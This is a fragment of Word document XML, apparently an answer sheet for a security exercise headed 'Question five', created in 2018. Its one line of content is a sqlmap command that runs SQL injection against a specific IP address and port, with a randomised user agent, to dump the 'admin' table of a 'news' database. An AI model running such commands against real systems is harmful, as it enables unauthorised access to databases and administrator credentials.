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DF" w:rsidRDefault="00445EDF">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>第五题</w:t>
      </w:r>
      <w:bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/>
    </w:p>
    <w:p w:rsidR="00511B5F" w:rsidRDefault="00445EDF">
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00445EDF">
        <w:t>sqlmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00445EDF">
        <w:t xml:space="preserve"> -u "114.55.36.69:8011" --random-agent --data="word=</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00445EDF">
        <w:t>a&amp;number</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00445EDF">
        <w:t>=5" -D news -T admin</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="0051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DF"/>
    <w:rsid w:val="00445EDF"/>
    <w:rsid w:val="0051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03B7-414F-4A62-9F66-4B25A221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jayus</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>jayus</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2018-11-03T23:39:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-11-03T23:40:00Z</dcterms:modified>
</cp:coreProperties>
</file>